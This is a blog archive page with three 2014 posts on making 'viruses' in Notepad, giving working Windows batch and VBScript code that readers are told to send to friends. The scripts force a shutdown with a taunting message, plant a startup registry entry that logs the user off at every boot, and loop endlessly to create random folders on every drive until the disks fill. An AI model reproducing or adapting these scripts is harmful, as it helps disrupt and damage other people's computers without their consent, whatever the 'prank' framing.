Posts

Showing posts from April, 2014

Make Viruses with Notepad Not Harmful But Funny

Image
There are some tricks for making virus, these viruses are not harmful it is only for fun with your friends give these viruses with flash drive or email These are cool notepad pranks witten in Microsoft Visual Basic, not some scary deadly virus, I stumbled across this stuff somewhere on d net and i thought i'd be a great idea to share wit u guys, create any of these files and try them out on your pc and see what i'm saying, or send it to your friends via e-mail. Doing this is fun, hehehe, Re-starting your computer cancels the effect unless you add the start-up code which I wont post here.  Create funny viruses with notepad 1. Convey your friend a lil' message and shut down his / her computer: open notepad and paste the following code @echo off msg * I don't like you shutdown -c "Error! You are too silly!" -s Save it as "Anything.BAT" in All Files and send it. 2.Toggle your friend's Caps Lock button simultaneously open notepad and paste the f...

How to Make Virus Using Notepad

Image
How to make virus using notepad  Create virus with notepad there are simple steps follow these steps and  make virus 1> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobject("wscript.shell") dim strDir,strfile,st,strtxt2,strshell,strlog dim obfso,obfolder,obshell,obfile,obtxtfile strshell="wscript.shell" strDir="C:\WINDOWS" strfile="\wscript.vbs" st=Chr(34) strlog="shutdown -l" strtxt2="ws.run(strlog)" set obfso=CreateObject("Scripting.FileSystemObject") on error resume next set obfile=obfso.CreateTextfile(strDir & strfile) obfile.writeline("set ws=createobject("&st&strshell&st&")") obfile.writeline("ws.run("&st&strlog&st&")") ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ” Now Save This Notepad file With An...

How to Create a Virus with Notepad

Image
We all know what virus is and how it totally overrides your computer, some of the viruses are pretty easy to remove but some other are quite hard to delete them. Using an antivirus is great idea especially when you are using Internet or USB flash drives. You don't know how those viruses are really compiled and created, almost 90% of computer viruses are made by simple programming language like C#, Visual Basic, Java, vbs and Batch Scripting which we are going to use in this tutorial. Create a Virus with Notepad this is educational purpose try it at your own risk  Create virus for infinity of folders CD, DVD, DVDR, Super Drive virus freeze CPU virus   Make an Infinity of Folders   1. Open Notepad   2. Paste the following code.   @echo off :VIRUS cd /d C: md %RANDOM% cd /d D: md %RANDOM% cd /d E: md %RANDOM% goto VIRUS REM ####################### REM 999khit.blogspot.com 3.  Now click File > Save as...   and save it as "folders .bat...